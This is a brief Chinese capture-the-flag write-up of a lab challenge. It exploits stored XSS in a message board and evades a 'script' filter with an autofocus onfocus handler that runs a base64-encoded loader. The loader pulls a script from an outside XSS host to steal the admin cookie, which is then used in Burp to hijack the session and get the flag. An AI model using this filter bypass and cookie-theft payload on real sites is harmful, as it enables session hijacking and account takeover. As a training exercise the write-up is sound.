啟動靶機
有留言板和登入功能,很明顯是儲存性xss,透過留言功能插入xss程式碼,獲取cookie登入後臺
先測試過濾
<script>alert(1);</script>
檢視原始碼發現script被過濾
<input onfocus="alert('xss');">
好像只過濾了script
找一個xss平臺或者自己用伺服器接受cookie
'"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvbzExIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
專案上線
獲取到了cookie cookie : PHPSESSID=8339da05744002f0617d48b003ce9d59
和後臺路徑 http://web/backend/admin.php
用burp更換cookie登入後臺
獲得flag flag{dbd806e6-ddb5-49e6-9648-c5a4676b2b66}